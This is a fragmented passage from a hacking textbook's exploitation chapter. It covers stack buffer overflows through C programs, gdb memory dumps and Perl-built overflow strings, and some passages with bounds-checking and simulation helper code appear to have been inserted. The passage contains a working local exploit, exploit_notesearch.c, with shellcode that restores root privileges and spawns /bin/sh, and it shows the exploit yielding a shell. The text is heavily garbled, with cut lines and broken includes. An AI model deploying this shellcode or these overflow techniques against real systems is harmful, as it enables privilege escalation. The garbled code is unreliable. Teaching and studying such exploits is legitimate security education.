reader@hacking:~/booksrc $ sudo chown root:root
...
/game_of_chance
reader@hacking:~/booksrc $
...

You have been given 100 credits
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

Sorry, you didn't win
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 90 credits] -> 2
[DEBUG] current_game pointer @ 0x08048f61
::::::: No Match Dealer :::::::
In this game you can wager up to all of your credits
...

If there are no matches among them, you double your money!

How many of your 90 credits would you like to wager? 30
::: Dealing out 16 random numbers :::
88 68 82 51 21 73 80 50
11 64 78 85 39 42 40 95
There were no matches! You win 30 credits!
You now have 120 credits
Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 120 credits] -> 3
[DEBUG] current_game pointer @ 0x0804914c
******* Find the Ace *******
In this game you can wager up to all of your credits
...

If you find the ace, you will win your wager
...

At this point you may either select a different card or
increase your wager
...
_
...
_
...
_
...
_
...

*** End result ***

...
_
...

Cards: |A| |Q| |Q|
^-- your pick
You have won 50 credits from your first wager
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] -> 4
====================| HIGH SCORE |====================
You currently have the high score of 170 credits!
======================================================
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] -> 7
Thanks for playing! Bye
...
/game_of_chance
-=-={ New Player Registration }=-=-
Enter your name: Jose Ronnick
Welcome to the Game of Chance Jose Ronnick
...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] -> 4
====================| HIGH SCORE |====================
Jon Erickson has the high score of 170
...

jose@hacking:~/booksrc $ exit
exit
reader@hacking:~/booksrc $

Play around with this program a little bit
...
Many people have difficulty understanding this
truth—that's why it's counterintuitive
...

Chapter 0x300
...
As demonstrated in the previous
chapter, a program is made up of a complex set of rules following a certain
execution flow that ultimately tells the computer what to do
...
Since a
program can really only do what it's designed to do, the security holes are actually
flaws or oversights in the design of the program or the environment the program
is running in
...
Sometimes these holes are the products of relatively
obvious programmer errors, but there are some less obvious errors that have
given birth to more complex exploit techniques that can be applied in many
different places
...

Unfortunately, what's written doesn't always coincide with what the programmer
intended the program to do
...
Instinctively, he picks the lamp up, rubs the side of it with his
sleeve, and out pops a genie
...
The man is ecstatic and knows
exactly what he wants
...
"
The genie snaps his fingers and a briefcase full of money materializes out
of thin air
...
"
The genie snaps his fingers and a Ferrari appears from a puff of smoke
...
"
The genie snaps his fingers and the man turns into a box of chocolates
...
Sometimes the repercussions can
be catastrophic
...
For example, one common programming error is called an off-by-one error
...

This happens more often than you might think, and it is best illustrated with a
question: If you're building a 100-foot fence, with fence posts spaced 10 feet
apart, how many fence posts do you need? The obvious answer is 10 fence posts,
but this is incorrect, since you actually need 11
...
Another example is
when a programmer is trying to select a range of numbers or items for
processing, such as items N through M
...
But this is
incorrect, since there are actually M - N + 1 items, for a total of 13 items
...

Often, fencepost errors go unnoticed because programs aren't tested for every
single possibility, and the effects of a fencepost error don't generally occur during
normal program execution
...
When properly exploited, an
off-by-one error can cause a seemingly secure program to become a security
vulnerability
...
However, there was an off-by-one error in
the channel-allocation code that was heavily exploited
...

This simple off-by-one error allowed further exploitation of the program, so that a
normal user authenticating and logging in could gain full administrative rights to
the system
...

Another situation that seems to breed exploitable programmer errors is when a
program is quickly modified to expand its functionality
...

Microsoft's IIS webserver program is designed to serve static and interactive web
content to users
...
Without this
limitation, users would have full control of the system, which is obviously
undesirable from a security perspective
...

With the addition of support for the Unicode character set, though, the complexity
of the program continued to increase
...

By using two bytes for each character instead of just one, Unicode allows for tens
of thousands of possible characters, as opposed to the few hundred allowed by
single-byte characters
...
For example, %5c in Unicode
translates to the backslash character, but this translation was done after the
path-checking code had run
...
Both the
Sadmind worm and the CodeRed worm used this type of Unicode conversion
oversight to deface web pages
...
Just like the rules of a
computer program, the US legal system sometimes has rules that don't say
exactly what their creators intended, and like a computer program exploit, these
legal loopholes can be used to sidestep the intent of the law
...
Those who had software to give would upload it, and those who wanted
software would download it
...
Software companies claimed that
they lost one million dollars as a result of Cynosure, and a federal grand jury
charged LaMacchia with one count of conspiring with unknown persons to violate
the wire fraud statute
...
Apparently, the lawmakers had never anticipated that
someone might engage in these types of activities with a motive other than
personal financial gain
...
) Even though this example doesn't involve the exploiting of a
computer program, the judges and courts can be thought of as computers
executing the program of the legal system as it was written
...

Generalized Exploit Techniques
Off-by-one errors and improper Unicode expansion are all mistakes that can be
hard to see at the time but are glaringly obvious to any programmer in hindsight
...
The impact of these mistakes on security isn't always apparent,
and these security problems are found in code everywhere
...

Most program exploits have to do with memory corruption
...
With these techniques, the ultimate goal is to take
control of the target program's execution flow by tricking it into running a piece
of malicious code that has been smuggled into memory
...
Like the LaMacchia
Loophole, these types of vulnerabilities exist because there are specific
unexpected cases that the program can't handle
...
But if the environment is carefully controlled, the
execution flow can be controlled—preventing the crash and reprogramming the
process
...
Most Internet worms use buffer overflow
vulnerabilities to propagate, and even the most recent zero-day VML vulnerability
in Internet Explorer is due to a buffer overflow
...
If this responsibility were shifted over to the
compiler, the resulting binaries would be significantly slower, due to integrity
checks on every variable
...

While C's simplicity increases the programmer's control and the efficiency of the
resulting programs, it can also result in programs that are vulnerable to buffer
overflows and memory leaks if the programmer isn't careful
...
If a programmer wants
to put ten bytes of data into a buffer that had only been allocated eight bytes of
space, that type of action is allowed, even though it will most likely cause the
program to crash
...
If a critical piece of data is overwritten, the
program will crash
...
c code offers an example
...
c
#include ...
h>
int main(int argc, char *argv[]) {
int value = 5;
char buffer_one[8], buffer_two[8];

strcpy(buffer_one, "one"); /* Put "one" into buffer_one
...
*/

printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1]));
strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two
...
After compilation in the sample output below, we try to copy ten
bytes from the first command-line argument into buffer_two, which only has
eight bytes allocated for it
...
c
reader@hacking:~/booksrc $
...

A larger buffer will naturally overflow into the other variables, but if a large
enough buffer is used, the program will crash and die
...
/overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 29 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $
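The overwritten variables in the output above come from strcpy() copying every byte of the argument without checking the size of buffer_two. As a minimal sketch of the alternative, assuming a hypothetical helper named bounded_copy() that is not part of the book's source, the length can be checked before anything is copied:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst only if it fits, including the
 * terminating null byte. Returns 0 on success, -1 if src is too long. */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    assert(dst != NULL && src != NULL);
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;                 /* would overflow: refuse to copy */
    memcpy(dst, src, len + 1);     /* len bytes plus the null terminator */
    return 0;
}
```

With an eight-byte destination, a seven-character string is accepted and a ten-character string is rejected, leaving the neighboring variables untouched.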

These types of program crashes are fairly common—think of all of the times a
program has crashed or blue-screened on you
...
These kinds of mistakes are easy to make and can be difficult to spot
...
c program on notesearch
...

You might not have noticed this until right now, even if you were already familiar
with C
...
/notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

Program crashes are annoying, but in the hands of a hacker they can become
downright dangerous
...
The exploit_notesearch
...

exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

for(i=0; i < 160; i+=4) // Fill buffer with return address
...

memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit
...
It uses string functions to do this:
strlen() to get the current length of the string (to position the buffer pointer)
and strcat() to concatenate the closing single quote to the end
...
The buffer that is
generated between the single quotes is the real meat of the exploit
...
Watch what a controlled crash
can do
...
c
reader@hacking:~/booksrc $
...
out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
This is an example of a stack-based buffer overflow
exploit
...

The auth_overflow
...

auth_overflow
...
h>
#include ...
h>
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <password>\n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted
...
\n");
}
}

This example program accepts a password as its only command-line argument
and then calls a check_authentication() function
...
If
either of these passwords is used, the function returns 1, which grants access
...
Use the -g option when you do compile it, though, since we
will be debugging this later
...
c
reader@hacking:~/booksrc $
...
/auth_overflow

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $

So far, everything works as the source code says it should
...
But an overflow can lead
to unexpected and even contradictory behavior, allowing access without a proper
password
...
/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Access Granted
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) list 1
1 #include ...
h>
3 #include ...
c, line 9
...
c, line 16
...
When the program is run, execution
will pause at these breakpoints and give us a chance to examine memory
...
c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0: ")????o??????)\205\004\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc: 0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0: 0xb7f9f729 0xb7fd6ff4 0xbffff7d8 0x08048529
0xbffff7b0: 0xb7fd6ff4 0xbffff870 0xbffff7d8 0x00000000
0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb
0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc
(gdb)

The first breakpoint is before the strcpy() happens
...
By examining the
address of the auth_flag variable, we can see both its location at 0xbffff7bc and
its value of 0
...
This relationship can
also be seen in a block of memory starting at password_buffer
...

(gdb) continue
Continuing
...
c:16
16 return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0: 'A'
(gdb) x/x &auth_flag
0xbffff7bc: 0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x00004141
0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb
0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc: 65 'A' 65 'A' 0 '\0' 0 '\0'
(gdb) x/dw &auth_flag
0xbffff7bc: 16705
(gdb)

Continuing to the next breakpoint found after the strcpy(), these memory
locations are examined again
...
The value of 0x00004141 might
look backward again, but remember that x86 is a little-endian architecture, so it's
supposed to look that way
...
Ultimately, the program will
treat this value as an integer, with a value of 16705
...
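The arithmetic behind that value can be checked without touching a real stack. The following is only a simulation under stated assumptions: a plain byte array stands in for the stack frame, the 28-byte distance between password_buffer and auth_flag is taken from the gdb output above, and the name simulated_auth_flag() is hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define FRAME_SIZE  32   /* simulated slice of the stack frame */
#define FLAG_OFFSET 28   /* auth_flag sits 28 bytes past password_buffer */

/* Copy `input` into a simulated frame the way strcpy() would, then return
 * the four bytes at FLAG_OFFSET decoded as a little-endian integer. */
uint32_t simulated_auth_flag(const char *input) {
    unsigned char frame[FRAME_SIZE] = {0};   /* auth_flag starts at 0 */
    size_t len = strlen(input);

    assert(len + 1 <= FRAME_SIZE);           /* keep the simulation in bounds */
    memcpy(frame, input, len + 1);           /* string plus null terminator */

    return (uint32_t)frame[FLAG_OFFSET]
         | (uint32_t)frame[FLAG_OFFSET + 1] << 8
         | (uint32_t)frame[FLAG_OFFSET + 2] << 16
         | (uint32_t)frame[FLAG_OFFSET + 3] << 24;
}
```

Thirty A characters place two 0x41 bytes in the flag, followed by the null terminator, which gives 0x00004141, or 16705. A short string such as "brillig" leaves the simulated flag at 0.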

-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Access Granted
...

(gdb)

After the overflow, the check_authentication() function will return 16705
instead of 0
...
In this example, the auth_flag variable is the execution control point,
since overwriting this value is the source of the control
...
In auth_overflow2
...

(Changes to auth_overflow
...
)

auth_overflow2
...
h>
#include ...
h>
int check_authentication(char *password) {
char password_buffer[16];
int auth_flag = 0;

strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <password>\n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted
...
\n");

}
}

This simple change puts the auth_flag variable before the password_buffer in
memory
...

reader@hacking:~/booksrc $ gcc -g auth_overflow2
...
/a
...
so
...

(gdb) list 1
1 #include ...
h>
3 #include ...
c, line 9
...
c, line 16
...
out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff9b7 'A' ) at
auth_overflow2
...

This means auth_flag can never be overwritten by an overflow in
password_buffer
...

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' )
at auth_overflow2
...
But another execution control point does exist, even though you
can't see it in the C code
...
This memory is integral to the operation of all
programs, so it exists in all programs, and when it's overwritten, it usually results
in a program crash
...

Program received signal SIGSEGV, Segmentation fault
...
The stack is a FILO data structure used to maintain execution
flow and context for local variables during function calls
...
Each stack frame contains
the local variables for that function and a return address so EIP can be restored
...
All of this is built into the architecture and is
usually handled by the compiler, not the programmer
...
In this frame are the local
variables, a return address, and the function's arguments
...
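The first-in, last-out ordering can be sketched with a toy stack. This is an illustration only: the type and function names are hypothetical, the stack is an array index rather than real memory growing toward lower addresses, and the pushed values in the usage note are borrowed from the gdb output in this section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STACK_WORDS 16

/* A toy FILO stack of 32-bit words; `top` counts the words in use. */
struct toy_stack {
    uint32_t words[STACK_WORDS];
    size_t top;
};

/* Place a word on top of the stack. */
void toy_push(struct toy_stack *s, uint32_t value) {
    assert(s->top < STACK_WORDS);    /* pushing past the end is a bug */
    s->words[s->top++] = value;
}

/* Remove and return the most recently pushed word. */
uint32_t toy_pop(struct toy_stack *s) {
    assert(s->top > 0);              /* popping an empty stack is a bug */
    return s->words[--s->top];
}
```

Pushing a function argument (0xbffff9b7), then a return address (0x080484bb), then a saved frame pointer, and popping three times returns them in the reverse order, which is why the return address is reached only after the rest of the frame has been removed.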

Figure 0x300-1
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...
h>
4
5 int check_authentication(char *password) {
6 char password_buffer[16];
7 int auth_flag = 0;
8
9 strcpy(password_buffer, password);
10
(gdb)
11 if(strcmp(password_buffer, "brillig") == 0)
12 auth_flag = 1;
13 if(strcmp(password_buffer, "outgrabe") == 0)
14 auth_flag = 1;
15
16 return auth_flag;
17 }
18
19 int main(int argc, char *argv[]) {
20 if(argc < 2) {
(gdb)
21 printf("Usage: %s <password>\n", argv[0]);
22 exit(0);
23 }
24 if(check_authentication(argv[1])) {
25 printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
26 printf(" Access Granted
...
\n");
30 }

(gdb) break 24
Breakpoint 1 at 0x80484ab: file auth_overflow2
...

(gdb) break 9
Breakpoint 2 at 0x8048421: file auth_overflow2
...

(gdb) break 16
Breakpoint 3 at 0x804846f: file auth_overflow2
...

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a
...
c:24
24 if(check_authentication(argv[1])) {
(gdb) i r esp
esp 0xbffff7e0 0xbffff7e0
(gdb) x/32xw $esp
0xbffff7e0: 0xb8000ce0 0x08048510 0xbffff848 0xb7eafebc
0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898
0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000
0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848
0xbffff820: 0x40f5f7f0 0x48e0fe81 0x00000000 0x00000000
0xbffff830: 0x00000000 0xb7ff9300 0xb7eafded 0xb8000ff4
0xbffff840: 0x00000002 0x08048350 0x00000000 0x08048371
0xbffff850: 0x08048474 0x00000002 0xbffff874 0x08048510
(gdb)

The first breakpoint is right before the call to check_authentication() in main()
...
This is all part of main()'s stack frame
...
After finding the addresses of the auth_flag variable and the variable
password_buffer, their locations can be seen within the stack frame
...

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' ) at
auth_overflow2
...
Since the
stack grows upward toward lower memory addresses, the stack pointer is now 64
bytes less at 0xbffff7a0
...
For example, the
first 24 bytes of this stack frame are just padding put there by the compiler
...
The auth_flag is shown at
0xbffff7bc, and the 16 bytes of the password buffer are shown at 0xbffff7c0
...

Elements of the check_authentication() stack frame are shown below
...
This starts at the
auth_flag variable at 0xbffff7bc and continues through the end of the 16-byte
password_buffer variable
...
If the program is
compiled with the flag -fomit-frame-pointer for optimization, the frame pointer
won't be used in the stack frame
...
This must be the argument to the check_authentication()
function
...
This process begins in the main() function, even before
the function call
...

(gdb)

Notice the two lines shown in bold on page 131
...
This is also the argument
to check_authentication()
...
This starts the stack frame for
check_authentication() with the function argument
...
This instruction pushes the address of the next instruction to the
stack and moves the execution pointer register (EIP) to the start of the
check_authentication() function
...
In this case, the address of the next instruction is
0x080484bb, so that is the return address
...

0x08048472 : leave
0x08048473 : ret
End of assembler dump
...
These instructions are known as the function
prologue
...
This saves 56 bytes for the local variables of
the function
...

When the function finishes, the leave and ret instructions remove the stack
frame and set the execution pointer register (EIP) to the saved return address in
the stack frame
...
This process happens
every time a function is called in any program
...

Breakpoint 3, check_authentication (password=0xbffff9b7 'A' )
at auth_overflow2
...

Program received signal SIGSEGV, Segmentation fault
...
This
usually results in a crash, since execution is essentially jumping to a random
location
...
If the overwrite is controlled,
execution can, in turn, be controlled to jump to a specific location
...
The BASH shell and Perl are common on
most machines and are all that is needed to experiment with exploitation
...
Perl can be
used to execute instructions on the command line by using the -e switch like this:
reader@hacking:~/booksrc $ perl -e 'print "A" x 20;'
AAAAAAAAAAAAAAAAAAAA

This command tells Perl to execute the commands found between the single
quotes—in this case, a single command of print "A" x 20;
...

Any character, such as a nonprintable character, can also be printed by using
\x##, where ## is the hexadecimal value of the character
...

reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;'
AAAAAAAAAAAAAAAAAAAA
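For readers who think in C rather than Perl, the same repetition can be sketched as a small helper. The name repeat_byte() is an assumption made for illustration; the point is only that the escape \x41 in C names the same byte as the letter A.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: write `count` copies of byte `c` into dst, then a
 * null terminator. dst_size must leave room for that terminator.
 * Returns the number of bytes written, not counting the terminator. */
size_t repeat_byte(char *dst, size_t dst_size, char c, size_t count) {
    assert(dst != NULL && count < dst_size);
    memset(dst, c, count);
    dst[count] = '\0';
    return count;
}
```

Calling repeat_byte(out, sizeof(out), '\x41', 20) on a 32-byte array produces the same twenty A characters as the Perl one-liner.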

In addition, string concatenation can be done in Perl with a period (
...

reader@hacking:~/booksrc $ perl -e 'print "A"x20
...
"\x61\x66\x67\x69"x2
...
This is done by surrounding the command with parentheses and prefixing a
dollar sign
...
This exact
command-substitution effect can be accomplished with grave accent marks (`, the
tilted single quote on the tilde key)
...

reader@hacking:~/booksrc $ u`perl -e 'print "na";'`me
Linux
reader@hacking:~/booksrc $ u$(perl -e 'print "na";')me
Linux
reader@hacking:~/booksrc $

Command substitution and Perl can be used in combination to quickly generate
overflow buffers on the fly
...
c program with buffers of precise lengths
...
/overflow_example $(perl -e 'print "A"x30')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 30 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $ gdb -q
(gdb) print 0xbffff7f4 - 0xbffff7e0
$1 = 20
(gdb) quit
reader@hacking:~/booksrc $
...
"ABCD"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 24 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAABCD'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAABCD'
[AFTER] value is at 0xbffff7f4 and is 1145258561 (0x44434241)
reader@hacking:~/booksrc $

In the output above, GDB is used as a hexadecimal calculator to figure out the
distance between buffer_two (0xbffff7e0) and the value variable
(0xbffff7f4), which turns out to be 20 bytes
...
The first character is the least significant byte, due to the little-endian architecture
...

reader@hacking:~/booksrc $
...

"\xef\xbe\xad\xde"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)
[STRCPY] copying 24 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAA??'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAA??'
[AFTER] value is at 0xbffff7f4 and is -559038737 (0xdeadbeef)
reader@hacking:~/booksrc $

This technique can be applied to overwrite the return address in the
auth_overflow2
...
In the example below, we will
overwrite the return address with a different address in main()
...
c
reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) disass main
Dump of assembler code for function main:
0x08048474 : push ebp
0x08048475 : mov ebp,esp
0x08048477 : sub esp,0x8
0x0804847a : and esp,0xfffffff0
0x0804847d : mov eax,0x0
0x08048482 : sub esp,eax
0x08048484 : cmp DWORD PTR [ebp+8],0x1
0x08048488 : jg 0x80484ab
0x0804848a : mov eax,DWORD PTR [ebp+12]
0x0804848d : mov eax,DWORD PTR [eax]
0x0804848f : mov DWORD PTR [esp+4],eax
0x08048493 : mov DWORD PTR [esp],0x80485e5
0x0804849a : call 0x804831c
0x0804849f : mov DWORD PTR [esp],0x0
0x080484a6 : call 0x804833c
0x080484ab : mov eax,DWORD PTR [ebp+12]
0x080484ae : add eax,0x4
0x080484b1 : mov eax,DWORD PTR [eax]
0x080484b3 : mov DWORD PTR [esp],eax
0x080484b6 : call 0x8048414
0x080484bb : test eax,eax
0x080484bd : je 0x80484e5
0x080484bf : mov DWORD PTR [esp],0x80485fb
0x080484c6 : call 0x804831c
0x080484cb : mov DWORD PTR [esp],0x8048619
0x080484d2 : call 0x804831c
0x080484d7 : mov DWORD PTR [esp],0x8048630
0x080484de : call 0x804831c

0x080484e3 : jmp 0x80484f1
0x080484e5 : mov DWORD PTR [esp],0x804864d
0x080484ec : call 0x804831c
0x080484f1 : leave
0x080484f2 : ret
End of assembler dump
...
The beginning of this section is at 0x080484bf, so if the return
address is overwritten with this value, this block of instructions will be executed
...
As long as the start of the buffer is aligned with DWORDs on
the stack, this mutability can be accounted for by simply repeating the return
address many times
...

reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=-
Segmentation fault (core dumped)

reader@hacking:~/booksrc $

In the example above, the target address of 0x080484bf is repeated 10 times to
ensure the return address is overwritten with the new target address
...
This gives
us more control; however, we are still limited to using instructions that exist in the
original programming
...
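Repeating an address means laying down the same four little-endian bytes back to back. A minimal sketch of that layout follows, assuming a hypothetical helper named fill_repeated_address(); it only fills a caller-supplied array and does not interact with any program.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fill buf with `count` back-to-back copies of addr, each stored as four
 * little-endian bytes. Returns the number of bytes written. */
size_t fill_repeated_address(unsigned char *buf, size_t buf_size,
                             uint32_t addr, size_t count) {
    assert(buf != NULL && count * 4 <= buf_size);
    for (size_t i = 0; i < count; i++) {
        buf[4 * i]     = (unsigned char)(addr & 0xff);
        buf[4 * i + 1] = (unsigned char)((addr >> 8) & 0xff);
        buf[4 * i + 2] = (unsigned char)((addr >> 16) & 0xff);
        buf[4 * i + 3] = (unsigned char)((addr >> 24) & 0xff);
    }
    return count * 4;
}
```

Ten copies of 0x080484bf occupy 40 bytes, and every aligned 4-byte slot in that range holds the bytes bf 84 04 08, so whichever slot lines up with the saved return address receives the same value.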

int main(int argc, char *argv[]) {
int userid, printing=1, fd; // File descriptor
char searchstring[100];
if(argc > 1) // If there is an arg
strcpy(searchstring, argv[1]); // that is the search string;
else // otherwise,
searchstring[0] = 0; // search string is empty
...
These instructions are called shellcode, and they tell the
program to restore privileges and open a shell prompt
...
Since this program
expects multiuser access, it runs under higher privileges so it can access its data
file, but the program logic prevents the user from using these higher privileges
for anything other than accessing the data file—at least that's the intention
...
This technique allows the
program to do things it was never programmed to do, while it's still running with
elevated privileges
...
Let's examine the exploit further
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...
h>
4 char shellcode[]=
5 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6 "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7 "\xe1\xcd\x80";
8
9 int main(int argc, char *argv[]) {
10 unsigned int i, *ptr, ret, offset=270;
(gdb)
11 char *command, *buffer;
12
13 command = (char *) malloc(200);
14 bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

18
19 if(argc > 1) // Set offset
...

23
24 for(i=0; i < 160; i+=4) // Fill buffer with return address
...

27 memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

28
29 strcat(command, "\'");
30
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch
...

(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch
...

(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch
...

(gdb)

The notesearch exploit generates a buffer in lines 24 through 27 (shown above in
bold)
...
The loop increments i by 4 each time
...

This has a size of 4, so when the whole thing is dereferenced, the entire 4-byte
value found in ret is written
...
out

Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch
...
/notesearch
